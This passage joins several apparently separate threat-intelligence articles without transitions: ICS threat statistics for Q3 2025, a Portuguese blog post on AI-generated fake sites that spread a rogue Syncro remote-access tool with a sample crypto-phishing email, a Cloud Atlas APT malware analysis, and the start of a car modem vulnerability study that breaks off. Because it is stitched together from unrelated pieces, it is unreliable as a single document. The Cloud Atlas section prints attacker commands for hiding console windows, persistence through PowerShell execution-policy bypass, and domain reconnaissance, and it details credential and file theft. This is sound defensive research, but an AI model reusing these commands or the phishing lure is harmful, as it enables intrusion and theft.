• The main categories of threats that spread through network folders were viruses, AutoCAD malware, worms, and spyware. The percentages of ICS computers where threats from this source were blocked ranged from 0.006% in Northern Europe to 0.20% in East Asia.

Threat categories

Typical attacks blocked within an OT network are multi-step sequences of malicious activities, where each subsequent step of the attackers is aimed at increasing privileges and/or gaining access to other systems by exploiting the security problems of industrial enterprises, including technological infrastructures.

Malicious objects used for initial infection

In Q3 2025, the percentage of ICS computers on which denylisted internet resources were blocked decreased to 4.01%. This is the lowest quarterly figure since the beginning of 2022.

Percentage of ICS computers on which denylisted internet resources were blocked, Q3 2022–Q3 2025

Regionally, the percentage of ICS computers on which denylisted internet resources were blocked ranged from 2.35% in Australia and New Zealand to 4.96% in Africa. Southeast Asia and South Asia were also among the top three regions for this indicator.

The percentage of ICS computers on which malicious documents were blocked has grown for three consecutive quarters, following a decline at the end of 2024. In Q3 2025, it reached 1,98%.

Percentage of ICS computers on which malicious documents were blocked, Q3 2022–Q3 2025

The indicator increased in four regions: South America, East Asia, Southeast Asia, and Australia and New Zealand. South America saw the largest increase as a result of a large-scale phishing campaign in which attackers used new exploits for an old vulnerability (CVE-2017-11882) in Microsoft Office Equation Editor to deliver various spyware to victims’ computers. It is noteworthy that the attackers in this phishing campaign used localized Spanish-language emails disguised as business correspondence.

In Q3 2025, the percentage of ICS computers on which malicious scripts and phishing pages were blocked increased to 6.79%. This category led the rankings of threat categories in terms of the percentage of ICS computers on which they were blocked.

Percentage of ICS computers on which malicious scripts and phishing pages were blocked, Q3 2022–Q3 2025

Regionally, the percentage of ICS computers on which malicious scripts and phishing pages were blocked ranged from 2.57% in Northern Europe to 9.41% in Africa. The top three regions for this indicator were Africa, East Asia, and South America. The indicator increased the most in East Asia (by a dramatic 5.23 pp) as a result of the local spread of malicious spyware scripts loaded into the memory of popular torrent clients including MediaGet.

Next-stage malware

Malicious objects used to initially infect computers deliver next-stage malware — spyware, ransomware, and miners — to victims’ computers. As a rule, the higher the percentage of ICS computers on which the initial infection malware is blocked, the higher the percentage for next-stage malware.
In Q3 2025, the percentage of ICS computers on which spyware and ransomware were blocked increased. The rates were:

• spyware: 4.04% (up 0.20 pp);
• ransomware: 0.17% (up 0.03 pp).

The percentage of ICS computers on which miners of both categories were blocked decreased. The rates were:

• miners in the form of executable files for Windows: 0.57% (down 0.06 pp), it’s the lowest level since Q3 2022;
• web miners: 0.25% (down 0.05 pp). This is the lowest level since Q3 2022.

Self-propagating malware

Self-propagating malware (worms and viruses) is a category unto itself. Worms and virus-infected files were originally used for initial infection, but as botnet functionality evolved, they took on next-stage characteristics.

To spread across ICS networks, viruses and worms rely on removable media and network folders in the form of infected files, such as archives with backups, office documents, pirated games and hacked applications. In rarer and more dangerous cases, web pages with network equipment settings, as well as files stored in internal document management systems, product lifecycle management (PLM) systems, resource management (ERP) systems and other web services are infected.

In Q3 2025, the percentage of ICS computers on which worms and viruses were blocked increased to 1.26% (by 0.04 pp) and 1.40% (by 0.11 pp), respectively.

AutoCAD malware

This category of malware can spread in a variety of ways, so it does not belong to a specific group.

In Q3 2025, the percentage of ICS computers on which AutoCAD malware was blocked slightly increased to 0.30% (by 0.01 pp).

For more information on industrial threats see the full version of the report.

Recentemente, detectamos uma nova campanha mal-intencionada que utiliza uma abordagem bastante intrigante. O agente cria suas próprias versões assinadas de uma ferramenta de acesso remoto (RAT) legítima. Para distribuí-las, ele usa um serviço baseado em IA para gerar em massa páginas da Web mal-intencionadas, que se disfarçam de forma convincente como os sites oficiais de vários aplicativos.

Continue lendo para descobrir como esse ataque funciona, por que ele é particularmente perigoso para os usuários e como se proteger.

Como funciona o ataque

Parece que o agente mal-intencionado utiliza várias opções de plataformas para seus ataques. Primeiro, ele claramente está apostando que um número significativo de usuários acesse as páginas falsas por meio de pesquisas simples no Google. Isso acontece porque os sites falsos normalmente têm endereços que correspondem, ou estão muito próximos, ao que os usuários estão procurando.

Ao pesquisar nos resultados de pesquisa do Google, às vezes você poderá encontrar vários sites falsos de Pokémon disfarçados de legítimos. Nesse caso, estamos analisando os clones da Polymarket.

Em segundo lugar, ele lança campanhas de e-mail mal-intencionadas como uma alternativa. Nesse cenário, o ataque é iniciado quando o usuário recebe um e-mail que contém um link para um site falso. Veja um exemplo similar a seguir:

Caros titulares de $DOP,
A janela de migração de DOP-v1 para DOP-v2 foi oficialmente fechada, com mais de 8B+ tokens migrados com êxito.
Temos o prazer de anunciar que o Portal de Solicitações de DOP-v2 já está ABERTO!
Todos os titulares de $DOP agora podem visitar o portal para solicitar seus tokens com segurança e passar para a próxima fase do ecossistema.
Solicite seus tokens de DOP-v2 agora https://migrate-dop{dot}org/
Bem-vindo ao DOP-v2: um capítulo mais forte, inteligente e recompensador começa hoje.
Agradecemos sua participação nesta jornada.
A Equipe DOP

Algumas das páginas mal-intencionadas que descobrimos nessa campanha se passam por sites de aplicativos antivírus ou de gerenciamento de senhas. Seu conteúdo é claramente elaborado para assustar o usuário com avisos falsos sobre algum tipo de problema de segurança.

Um site falso da Avira avisa sobre uma vulnerabilidade e aconselha o download da sua “atualização”

Portanto, os invasores também estão usando uma tática conhecida como scareware: impor um aplicativo não seguro aos usuários sob o pretexto de proteção contra uma ameaça imaginária.

Uma página falsa da Dashlane avisa sobre uma “exposição de metadados de criptografia de alta gravidade que afeta a sincronização de retransmissão na nuvem”, seja lá o que isso signifique. E, claro, você não pode corrigi-la, a menos que faça o download de algo

Sites falsos criados com o Lovable

Apesar das diferenças de conteúdo, os sites falsos envolvidos nesta campanha mal-intencionada compartilham vários recursos comuns. Para começar, a maioria de seus endereços é construída de acordo com a fórmula {popular app name} + desktop.com, uma URL que corresponde a uma consulta de pesquisa obviamente comum.

Além disso, as próprias páginas falsas parecem bastante profissionais. Curiosamente, a aparência dos sites falsos não replica exatamente o design dos originais, eles não são clones diretos. Em vez disso, são variações muito convincentes de um tema. Como exemplo, podemos ver algumas versões falsas da página da carteira de criptomoedas da Lace. Uma delas tem o seguinte formato:

A primeira variante do site falso da Lace

A segunda variante do site falso da Lace

Outra se parece com isto:

Essas falsificações se parecem muito com o site original da Lace, mas ainda assim diferem dele de muitas maneiras óbvias:

As versões falsas são semelhantes em alguns aspectos ao site genuíno da Lace, mas diferem em outros pontos. Fonte

Na verdade, os invasores transformaram um construtor Web com tecnologia de IA em uma arma para criar páginas falsas. Como os invasores agiram de forma apressada e acabaram deixando para trás alguns sinais reveladores, conseguimos identificar exatamente qual serviço eles estão utilizando: Lovable.

O uso de uma ferramenta de IA permitiu que eles reduzissem bastante o tempo necessário para criar um site falso e produzissem falsificações em escala industrial.

Ferramenta de administração remota da Syncro

Outra característica comum dos sites falsos usados nessa campanha é que todos eles distribuem exatamente a mesma carga. O agente mal-intencionado não criou seu próprio cavalo de Troia, nem comprou um no mercado clandestino. Em vez disso, ele está usando sua própria versão de uma ferramenta de acesso remoto perfeitamente legítima: a Syncro.

O aplicativo original facilita o monitoramento centralizado e o acesso remoto para equipes de suporte de TI corporativas e provedores de serviços gerenciados (MSPs). Os serviços da Syncro são relativamente baratos, a partir de US$ 129 por mês, com um número ilimitado de dispositivos gerenciados.

Site falso da carteira de criptomoedas da Yoroi

Ao mesmo tempo, a ferramenta tem recursos importantes: além do compartilhamento de tela, o serviço também fornece execução remota de comandos, transferência de arquivos, análise de logs, edição do registro e mais ações em segundo plano. No entanto, o principal recurso da Syncro é um processo simplificado de instalação e conexão. O usuário (ou, neste caso, a vítima) só precisa baixar e executar o arquivo de instalação.

A partir daí, a instalação é executada completamente em segundo plano, carregando secretamente uma versão mal-intencionada da Syncro no computador. Como essa versão tem o CUSTOMER_ID do invasor codificado, ele passa a ter o controle total sobre o computador da vítima.

A janela do instalador da Syncro pisca na tela por alguns segundos, e somente um usuário atento poderia notar que o software errado está sendo configurado

Depois que a Syncro é instalada no dispositivo da vítima, os invasores passam a ter acesso total e podem usá-la para alcançar seus objetivos. Dado o contexto, esses ataques parecem estar roubando chaves da carteira de criptomoedas das vítimas e desviando fundos para as próprias contas dos invasores.

Outro site falso, desta vez para o protocolo DeFi da Liqwid. Embora a Liqwid ofereça apenas um aplicativo Web, o site falso permite que os usuários baixem versões para Windows, macOS e até mesmo Linux

Como se proteger contra esses ataques

Essa campanha mal-intencionada representa uma ameaça maior para os usuários por dois motivos principais. Primeiro, os sites falsos criados com o serviço de IA parecem bastante profissionais e seus URLs não são excessivamente suspeitos. Obviamente, tanto o design das páginas falsas quanto os domínios usados diferem visivelmente dos reais, mas isso só se torna aparente na comparação direta. À primeira vista, no entanto, é fácil confundir o falso com o genuíno.

Em segundo lugar, os invasores estão usando uma ferramenta de acesso remoto legítima para infectar os usuários. Isso significa que detectar a infecção pode ser difícil.

Nossa solução de segurança tem um veredicto especial, “Not-a-virus“, para casos como esses. Esse veredicto é atribuído, entre outras coisas, quando várias ferramentas de acesso remoto, inclusive a Syncro legítima, são detectadas no dispositivo. Em relação às versões da Syncro usadas para fins mal-intencionados, nossa solução de segurança as identifica como HEUR:Backdoor.OLE2.RA-Based.gen.

É importante lembrar que, por padrão, um antivírus não bloqueará todas as ferramentas de administração remotas legítimas para evitar a interferência no uso intencional. Portanto, recomendamos que preste muita atenção às notificações da sua solução de segurança. Caso veja um aviso de que um software Not-a-virus foi detectado no seu dispositivo, leve-o a sério e, no mínimo, verifique qual aplicativo o acionou.

Se você tem Kaspersky Premium instalado, use o recurso de Detecção de acesso remoto e, se necessário, a opção de remoção do aplicativo, que acompanha sua assinatura premium. Esse recurso detecta cerca de 30 dos aplicativos legítimos de acesso remoto mais populares e, se você sabe que não instalou nenhum deles, deve realmente se preocupar.

O Kaspersky Premium detecta (e permite remover) até mesmo versões legítimas da Syncro e de outros aplicativos de acesso remoto.

Outras recomendações:

• Não baixe aplicativos de fontes duvidosas, especialmente em dispositivos com aplicativos financeiros ou de criptomoedas instalados.
• Sempre verifique os endereços das páginas que você está visitando antes de executar qualquer ação potencialmente perigosa, como baixar um aplicativo ou inserir dados pessoais.
• Preste muita atenção aos avisos dos sistemas antivírus e anti-phishing integrados nas nossas soluções de segurança.

Known since 2014, the Cloud Atlas group targets countries in Eastern Europe and Central Asia. Infections occur via phishing emails containing a malicious document that exploits an old vulnerability in the Microsoft Office Equation Editor process (CVE-2018-0802) to download and execute malicious code. In this report, we describe the infection chain and tools that the group used in the first half of 2025, with particular focus on previously undescribed implants.

Additional information about this threat, including indicators of compromise, is available to customers of the Kaspersky Intelligence Reporting Service. Contact: intelreports@kaspersky.com.

Technical details

Initial infection

The starting point is typically a phishing email with a malicious DOC(X) attachment. When the document is opened, a malicious template is downloaded from a remote server. The document has the form of an RTF file containing an exploit for the formula editor, which downloads and executes an HTML Application (HTA) file.
Fpaylo

Malicious template with the exploit loaded by Word when opening the document

We were unable to obtain the actual RTF template with the exploit. We assume that after a successful infection of the victim, the link to this file becomes inaccessible. In the given example, the malicious RTF file containing the exploit was downloaded from the URL hxxps://securemodem[.]com?tzak.html_anacid.

Template files, like HTA files, are located on servers controlled by the group, and their downloading is limited both in time and by the IP addresses of the victims. The malicious HTA file extracts and creates several VBS files on disk that are parts of the VBShower backdoor. VBShower then downloads and installs other backdoors: PowerShower, VBCloud, and CloudAtlas.

This infection chain largely follows the one previously seen in Cloud Atlas’ 2024 attacks. The currently employed chain is presented below:

Malware execution flow

Several implants remain the same, with insignificant changes in file names, and so on. You can find more details in our previous article on the following implants:

• HTA file
• VBShower::Launcher
• VBShower::Cleaner

In this research, we’ll focus on new and updated components.

VBShower

VBShower::Backdoor

Compared to the previous version, the backdoor runs additional downloaded VB scripts in the current context, regardless of the size. A previous modification of this script checked the size of the payload, and if it exceeded 1 MB, instead of executing it in the current context, the backdoor wrote it to disk and used the wscript utility to launch it.

VBShower::Payload (1)

The script collects information about running processes, including their creation time, caption, and command line. The collected information is encrypted and sent to the C2 server by the parent script (VBShower::Backdoor) via the v_buff variable.

VBShower::Payload (1)

VBShower::Payload (2)

The script is used to install the VBCloud implant. First, it downloads a ZIP archive from the hardcoded URL and unpacks it into the %Public% directory. Then, it creates a scheduler task named “MicrosoftEdgeUpdateTask” to run the following command line:

wscript.exe /B %Public%\Libraries\MicrosoftEdgeUpdate.vbs

It renames the unzipped file %Public%\Libraries\v.log to %Public%\Libraries\MicrosoftEdgeUpdate.vbs, iterates through the files in the %Public%\Libraries directory, and collects information about the filenames and sizes. The data, in the form of a buffer, is collected in the v_buff variable. The malware gets information about the task by executing the following command line:

cmd.exe /c schtasks /query /v /fo CSV /tn MicrosoftEdgeUpdateTask

The specified command line is executed, with the output redirected to the TMP file. Both the TMP file and the content of the v_buff variable will be sent to the C2 server by the parent script (VBShower::Backdoor).

Here is an example of the information present in the v_buff variable:

Libraries:
desktop.ini-175|
MicrosoftEdgeUpdate.vbs-2299|
RecordedTV.library-ms-999|
upgrade.mds-32840|
v.log-2299|

The file MicrosoftEdgeUpdate.vbs is a launcher for VBCloud, which reads the encrypted body of the backdoor from the file upgrade.mds, decrypts it, and executes it.

VBShower::Payload (2) used to install VBCloud

Almost the same script is used to install the CloudAtlas backdoor on an infected system. The script only downloads and unpacks the ZIP archive to "%LOCALAPPDATA%", and sends information about the contents of the directories "%LOCALAPPDATA%\vlc\plugins\access" and "%LOCALAPPDATA%\vlc" as output.

In this case, the file renaming operation is not applied, and there is no code for creating a scheduler task.

Here is an example of information to be sent to the C2 server:

vlc:
a.xml-969608|
b.xml-592960|
d.xml-2680200|
e.xml-185224||
access:
c.xml-5951488|

In fact, a.xml, d.xml, and e.xml are the executable file and libraries, respectively, of VLC Media Player. The c.xml file is a malicious library used in a DLL hijacking attack, where VLC acts as a loader, and the b.xml file is an encrypted body of the CloudAtlas backdoor, read from disk by the malicious library, decrypted, and executed.

VBShower::Payload (2) used to install CloudAtlas

VBShower::Payload (3)

This script is the next component for installing CloudAtlas. It is downloaded by VBShower from the C2 server as a separate file and executed after the VBShower::Payload (2) script. The script renames the XML files unpacked by VBShower::Payload (2) from the archive to the corresponding executables and libraries, and also renames the file containing the encrypted backdoor body.

These files are copied by VBShower::Payload (3) to the following paths:

Additionally, VBShower::Payload (3) creates a scheduler task to execute the command line: "%LOCALAPPDATA%\vlc\vlc.exe". The script then iterates through the files in the "%LOCALAPPDATA%\vlc" and "%LOCALAPPDATA%\vlc\plugins\access" directories, collecting information about filenames and sizes. The data, in the form of a buffer, is collected in the v_buff variable. The script also retrieves information about the task by executing the following command line, with the output redirected to a TMP file:

cmd.exe /c schtasks /query /v /fo CSV /tn MicrosoftVLCTaskMachine

Both the TMP file and the content of the v_buff variable will be sent to the C2 server by the parent script (VBShower::Backdoor).

VBShower::Payload (3) used to install CloudAtlas

VBShower::Payload (4)

This script was previously described as VBShower::Payload (1).

VBShower::Payload (5)

This script is used to check access to various cloud services and executed before installing VBCloud or CloudAtlas. It consistently accesses the URLs of cloud services, and the received HTTP responses are saved to the v_buff variable for subsequent sending to the C2 server. A truncated example of the information sent to the C2 server:

GET-https://webdav.yandex.ru|
200|
<!DOCTYPE html><html lang="ru" dir="ltr" class="desktop"><head><base href="...

VBShower::Payload (5)

VBShower::Payload (6)

This script was previously described as VBShower::Payload (2).

VBShower::Payload (7)

This is a small script for checking the accessibility of PowerShower’s C2 from an infected system.

VBShower::Payload (7)

VBShower::Payload (8)

This script is used to install PowerShower, another backdoor known to be employed by Cloud Atlas. The script does so by performing the following steps in sequence:

1. Creates registry keys to make the console window appear off-screen, effectively hiding it:
   

   "HKCU\Console\%SystemRoot%_System32_WindowsPowerShell_v1.0_powershell.exe"::"WindowPosition"::5122
   "HKCU\UConsole\taskeng.exe"::"WindowPosition"::538126692

2. Creates a “MicrosoftAdobeUpdateTaskMachine” scheduler task to execute the command line:
   

   powershell.exe -ep bypass -w 01 %APPDATA%\Adobe\AdobeMon.ps1

3. Decrypts the contents of the embedded data block with XOR and saves the resulting script to the file "%APPDATA%\Adobe\p.txt". Then, renames the file "p.txt" to "AdobeMon.ps1".
4. Collects information about file names and sizes in the path "%APPDATA%\Adobe". Gets information about the task by executing the following command line, with the output redirected to a TMP file:
   

   cmd.exe /c schtasks /query /v /fo LIST /tn MicrosoftAdobeUpdateTaskMachine

VBShower::Payload (8) used to install PowerShower

The decrypted PowerShell script is disguised as one of the standard modules, but at the end of the script, there is a command to launch the PowerShell interpreter with another script encoded in Base64.

Content of AdobeMon.ps1 (PowerShower)

VBShower::Payload (9)

This is a small script for collecting information about the system proxy settings.

VBShower::Payload (9)

VBCloud

On an infected system, VBCloud is represented by two files: a VB script (VBCloud::Launcher) and an encrypted main body (VBCloud::Backdoor). In the described case, the launcher is located in the file MicrosoftEdgeUpdate.vbs, and the payload — in upgrade.mds.

VBCloud::Launcher

The launcher script reads the contents of the upgrade.mds file, decodes characters delimited with “%H”, uses the RC4 stream encryption algorithm with a key built into the script to decrypt it, and transfers control to the decrypted content. It is worth noting that the implementation of RC4 uses PRGA (pseudo-random generation algorithm), which is quite rare, since most malware implementations of this algorithm skip this step.

VBCloud::Launcher

VBCloud::Backdoor

The backdoor performs several actions in a loop to eventually download and execute additional malicious scripts, as described in the previous research.

VBCloud::Payload (FileGrabber)

Unlike VBShower, which uses a global variable to save its output or a temporary file to be sent to the C2 server, each VBCloud payload communicates with the C2 server independently. One of the most commonly used payloads for the VBCloud backdoor is FileGrabber. The script exfiltrates files and documents from the target system as described before.

The FileGrabber payload has the following limitations when scanning for files:

• It ignores the following paths:
  • Program Files
  • Program Files (x86)
  • %SystemRoot%
• The file size for archiving must be between 1,000 and 3,000,000 bytes.
• The file’s last modification date must be less than 30 days before the start of the scan.
• Files containing the following strings in their names are ignored:
  • “intermediate.txt”
  • “FlightingLogging.txt”
  • “log.txt”
  • “thirdpartynotices”
  • “ThirdPartyNotices”
  • “easylist.txt”
  • “acroNGLLog.txt”
  • “LICENSE.txt”
  • “signature.txt”
  • “AlternateServices.txt”
  • “scanwia.txt”
  • “scantwain.txt”
  • “SiteSecurityServiceState.txt”
  • “serviceworker.txt”
  • “SettingsCache.txt”
  • “NisLog.txt”
  • “AppCache”
  • “backupTest”

Part of VBCloud::Payload (FileGrabber)

PowerShower

As mentioned above, PowerShower is installed via one of the VBShower payloads. This script launches the PowerShell interpreter with another script encoded in Base64. Running in an infinite loop, it attempts to access the C2 server to retrieve an additional payload, which is a PowerShell script twice encoded with Base64. This payload is executed in the context of the backdoor, and the execution result is sent to the C2 server via an HTTP POST request.

Decoded PowerShower script

In previous versions of PowerShower, the payload created a sapp.xtx temporary file to save its output, which was sent to the C2 server by the main body of the backdoor. No intermediate files are created anymore, and the result of execution is returned to the backdoor by a normal call to the "return" operator.

PowerShower::Payload (1)

This script was previously described as PowerShower::Payload (2). This payload is unique to each victim.

PowerShower::Payload (2)

This script is used for grabbing files with metadata from a network share.

PowerShower::Payload (2)

CloudAtlas

As described above, the CloudAtlas backdoor is installed via VBShower from a downloaded archive delivered through a DLL hijacking attack. The legitimate VLC application acts as a loader, accompanied by a malicious library that reads the encrypted payload from the file and transfers control to it. The malicious DLL is located at "%LOCALAPPDATA%\vlc\plugins\access", while the file with the encrypted payload is located at "%LOCALAPPDATA%\vlc\".

When the malicious DLL gains control, it first extracts another DLL from itself, places it in the memory of the current process, and transfers control to it. The unpacked DLL uses a byte-by-byte XOR operation to decrypt the block with the loader configuration. The encrypted config immediately follows the key. The config specifies the name of the event that is created to prevent a duplicate payload launch. The config also contains the name of the file where the encrypted payload is located — "chambranle" in this case — and the decryption key itself.

Encrypted and decrypted loader configuration

The library reads the contents of the "chambranle" file with the payload, uses the key from the decrypted config and the IV located at the very end of the "chambranle" file to decrypt it with AES-256-CBC. The decrypted file is another DLL with its size and SHA-1 hash embedded at the end, added to verify that the DLL is decrypted correctly. The DLL decrypted from "chambranle" is the main body of the CloudAtlas backdoor, and control is transferred to it via one of the exported functions, specifically the one with ordinal 2.

Main routine that processes the payload file

When the main body of the backdoor gains control, the first thing it does is decrypt its own configuration. Decryption is done in a similar way, using AES-256-CBC. The key for AES-256 is located before the configuration, and the IV is located right after it. The most useful information in the configuration file includes the URL of the cloud service, paths to directories for receiving payloads and unloading results, and credentials for the cloud service.

Encrypted and decrypted CloudAtlas backdoor config

Immediately after decrypting the configuration, the backdoor starts interacting with the C2 server, which is a cloud service, via WebDAV. First, the backdoor uses the MKCOL HTTP method to create two directories: one ("/guessed/intershop/Euskalduns/") will regularly receive a beacon in the form of an encrypted file containing information about the system, time, user name, current command line, and volume information. The other directory ("/cancrenate/speciesists/") is used to retrieve payloads. The beacon file and payload files are AES-256-CBC encrypted with the key that was used for backdoor configuration decryption.

HTTP requests of the CloudAtlas backdoor

The backdoor uses the HTTP PROPFIND method to retrieve the list of files. Each of these files will be subsequently downloaded, deleted from the cloud service, decrypted, and executed.

HTTP requests from the CloudAtlas backdoor

The payload consists of data with a binary block containing a command number and arguments at the beginning, followed by an executable plugin in the form of a DLL. The structure of the arguments depends on the type of command. After the plugin is loaded into memory and configured, the backdoor calls the exported function with ordinal 1, passing several arguments: a pointer to the backdoor function that implements sending files to the cloud service, a pointer to the decrypted backdoor configuration, and a pointer to the binary block with the command and arguments from the beginning of the payload.

Plugin setup and execution routine

Before calling the plugin function, the backdoor saves the path to the current directory and restores it after the function is executed. Additionally, after execution, the plugin is removed from memory.

CloudAtlas::Plugin (FileGrabber)

FileGrabber is the most commonly used plugin. As the name suggests, it is designed to steal files from an infected system. Depending on the command block transmitted, it is capable of:

• Stealing files from all local disks
• Stealing files from the specified removable media
• Stealing files from specified folders
• Using the selected username and password from the command block to mount network resources and then steal files from them

For each detected file, a series of rules are generated based on the conditions passed within the command block, including:

• Checking for minimum and maximum file size
• Checking the file’s last modification time
• Checking the file path for pattern exclusions. If a string pattern is found in the full path to a file, the file is ignored
• Checking the file name or extension against a list of patterns

Resource scanning

If all conditions match, the file is sent to the C2 server, along with its metadata, including attributes, creation time, last access time, last modification time, size, full path to the file, and SHA-1 of the file contents. Additionally, if a special flag is set in one of the rule fields, the file will be deleted after a copy is sent to the C2 server. There is also a limit on the total amount of data sent, and if this limit is exceeded, scanning of the resource stops.

Generating data for sending to C2

CloudAtlas::Plugin (Common)

This is a general-purpose plugin, which parses the transferred block, splits it into commands, and executes them. Each command has its own ID, ranging from 0 to 6. The list of commands is presented below.

1. Command ID 0: Creates, sets and closes named events.
2. Command ID 1: Deletes the selected list of files.
3. Command ID 2: Drops a file on disk with content and a path selected in the command block arguments.
4. Command ID 3: Capable of performing several operations together or independently, including:
   1. Dropping several files on disk with content and paths selected in the command block arguments
   2. Dropping and executing a file at a specified path with selected parameters. This operation supports three types of launch:
   • Using the WinExec function
   • Using the ShellExecuteW function
   • Using the CreateProcessWithLogonW function, which requires that the user’s credentials be passed within the command block to launch the process on their behalf
5. Command ID 4: Uses the StdRegProv COM interface to perform registry manipulations, supporting key creation, value deletion, and value setting (both DWORD and string values).
6. Command ID 5: Calls the ExitProcess function.
7. Command ID 6: Uses the credentials passed within the command block to connect a network resource, drops a file to the remote resource under the name specified within the command block, creates and runs a VB script on the local system to execute the dropped file on the remote system. The VB script is created at "%APPDATA%\ntsystmp.vbs". The path to launch the file dropped on the remote system is passed to the launched VB script as an argument.

Content of the dropped VBS

CloudAtlas::Plugin (PasswordStealer)

This plugin is used to steal cookies and credentials from browsers. This is an extended version of the Common Plugin, which is used for more specific purposes. It can also drop, launch, and delete files, but its primary function is to drop files belonging to the “Chrome App-Bound Encryption Decryption” open-source project onto the disk, and run the utility to steal cookies and passwords from Chromium-based browsers. After launching the utility, several files ("cookies.txt" and "passwords.txt") containing the extracted browser data are created on disk. The plugin then reads JSON data from the selected files, parses the data, and sends the extracted information to the C2 server.

Part of the function for parsing JSON and sending the extracted data to C2

CloudAtlas::Plugin (InfoCollector)

This plugin is used to collect information about the infected system. The list of commands is presented below.

1. Command ID 0xFFFFFFF0: Collects the computer’s NetBIOS name and domain information.
2. Command ID 0xFFFFFFF1: Gets a list of processes, including full paths to executable files of processes, and a list of modules (DLLs) loaded into each process.
3. Command ID 0xFFFFFFF2: Collects information about installed products.
4. Command ID 0xFFFFFFF3: Collects device information.
5. Command ID 0xFFFFFFF4: Collects information about logical drives.
6. Command ID 0xFFFFFFF5: Executes the command with input/output redirection, and sends the output to the C2 server. If the command line for execution is not specified, it sequentially launches the following utilities and sends their output to the C2 server:

net group "Exchange servers" /domain
Ipconfig
arp -a

Python script

As mentioned in one of our previous reports, Cloud Atlas uses a custom Python script named get_browser_pass.py to extract saved credentials from browsers on infected systems. If the Python interpreter is not present on the victim’s machine, the group delivers an archive that includes both the script and a bundled Python interpreter to ensure execution.

During one of the latest incidents we investigated, we once again observed traces of this tool in action, specifically the presence of the file "C:\ProgramData\py\pytest.dll".

The pytest.dll library is called from within get_browser_pass.py and used to extract credentials from Yandex Browser. The data is then saved locally to a file named y3.txt.

Victims

According to our telemetry, the identified targets of the malicious activities described here are located in Russia and Belarus, with observed activity dating back to the beginning of 2025. The industries being targeted are diverse, encompassing organizations in the telecommunications sector, construction, government entities, and plants.

Conclusion

For more than ten years, the group has carried on its activities and expanded its arsenal. Now the attackers have four implants at their disposal (PowerShower, VBShower, VBCloud, CloudAtlas), each of them a full-fledged backdoor. Most of the functionality in the backdoors is duplicated, but some payloads provide various exclusive capabilities. The use of cloud services to manage backdoors is a distinctive feature of the group, and it has proven itself in various attacks.

Indicators of compromise

Note: The indicators in this section are valid at the time of publication.

File hashes

0D309C25A835BAF3B0C392AC87504D9E    протокол (08.05.2025).doc
D34AAEB811787B52EC45122EC10AEB08    HTA
4F7C5088BCDF388C49F9CAAD2CCCDCC5    StandaloneUpdate_2020-04-13_090638_8815-145.log:StandaloneUpdate_2020-04-13_090638_8815-145cfcf.vbs
5C93AF19EF930352A251B5E1B2AC2519    StandaloneUpdate_2020-04-13_090638_8815-145.log:StandaloneUpdate_2020-04-13_090638_8815-145.dat (encrypted)
0E13FA3F06607B1392A3C3CAA8092C98    VBShower::Payload(1)
BC80C582D21AC9E98CBCA2F0637D8993    VBShower::Payload(2)
12F1F060DF0C1916E6D5D154AF925426    VBShower::Payload(3)
E8C21CA9A5B721F5B0AB7C87294A2D72    VBShower::Payload(4)
2D03F1646971FB7921E31B647586D3FB    VBShower::Payload(5)
7A85873661B50EA914E12F0523527CFA    VBShower::Payload(6)
F31CE101CBE25ACDE328A8C326B9444A    VBShower::Payload(7)
E2F3E5BF7EFBA58A9C371E2064DFD0BB    VBShower::Payload(8)
67156D9D0784245AF0CAE297FC458AAC    VBShower::Payload(9)
116E5132E30273DA7108F23A622646FE    VBCloud::Launcher
E9F60941A7CED1A91643AF9D8B92A36D    VBCloud::Payload(FileGrabber)
718B9E688AF49C2E1984CF6472B23805    PowerShower
A913EF515F5DC8224FCFFA33027EB0DD    PowerShower::Payload(2)
BAA59BB050A12DBDF981193D88079232    chambranle (encrypted)

Domains and IPs

billet-ru[.]net
mskreg[.]net
flashsupport[.]org
solid-logit[.]com
cityru-travel[.]org
transferpolicy[.]org
information-model[.]net
securemodem[.]com

Introduction

Imagine you’re cruising down the highway in your brand-new electric car. All of a sudden, the massive multimedia display fills with Doom, the iconic 3D shooter game. It completely replaces the navigation map or the controls menu, and you realize someone is playing it remotely right now. This is not a dream or an overactive imagination – we’ve demonstrated that it’s a perfectly realistic scenario in today’s world.

The internet of things now plays a significant role in the modern world. Not only are smartphones and laptops connected to the network, but also factories, cars, trains, and even airplanes. Most of the time, connectivity is provided via 3G/4G/5G mobile data networks using modems installed in these vehicles and devices. These modems are increasingly integrated into a System-on-Chip (SoC), which uses a Communication Processor (CP) and an Application Processor (AP) to perform multiple functions simultaneously. A general-purpose operating system such as Android can run on the AP, while the CP, which handles communication with the mobile network, typically runs on a dedicated OS. The interaction between the AP, CP, and RAM within the SoC at the microarchitecture level is a “black box” known only to the manufacturer – even though the security of the entire SoC depends on it.

Bypassing 3G/LTE security mechanisms is generally considered a purely academic challenge because a secure communication channel is established when a user device (User Equipment, UE) connects to a cellular base station (Evolved Node B, eNB). Even if someone can bypass its security mechanisms, discover a vulnerability in the modem, and execute their own code on it, this is unlikely to compromise the device’s business logic. This logic (for example, user applications, browser history, calls, and SMS on a smartphone) resides on the AP and is presumably not accessible from the modem.

To find out, if that is true, we conducted a security assessment of a modern SoC, Unisoc UIS7862A, which features an integrated 2G/3G/4G modem. This SoC can be found in various mobile devices by multiple vendors or, more interestingly, in the head units of modern Chinese vehicles, which are becoming increasingly common on the roads. The head unit is one of a car’s key components, and a breach of its information security poses a threat to road safety, as well as the confidentiality of user data.

During our research, we identified several critical vulnerabilities at various levels of the Unisoc UIS7862A modem’s cellular protocol stack. This article discusses a stack-based buffer overflow vulnerability in the 3G RLC protocol implementation (CVE-2024-39432). The vulnerability can be exploited to achieve remote code execution at the early stages of connection, before any protection mechanisms are activated.

Importantly, gaining the ability to execute code on the modem is only the entry point for a complete remote compromise of the entire SoC. Our subsequent efforts were focused on gaining access to the AP. We discovered several ways to do so, including leveraging a hardware vulnerability in the form of a hidden peripheral Direct Memory Access (DMA) device to perform lateral movement within the SoC. This enabled us to install our own patch into the running Android kernel and execute arbitrary code on the AP with the highest privileges. Details are provided in the relevant sections.

Acquiring the modem firmware

The modem at the center of our research was found on the circuit board of the head unit in a Chinese car.

Circuit board of the head unit

Description of the circuit board components:

Using information about the modem’s hardware, we desoldered and read the embedded multimedia memory card, which contained a complete image of its operating system. We then analyzed the image obtained.

Remote access to the modem (CVE-2024-39431)

The modem under investigation, like any modern modem, implements several protocol stacks: 2G, 3G, and LTE. Clearly, the more protocols a device supports, the more potential entry points (attack vectors) it has. Moreover, the lower in the OSI network model stack a vulnerability sits, the more severe the consequences of its exploitation can be. Therefore, we decided to analyze the data packet fragmentation mechanisms at the data link layer (RLC protocol).

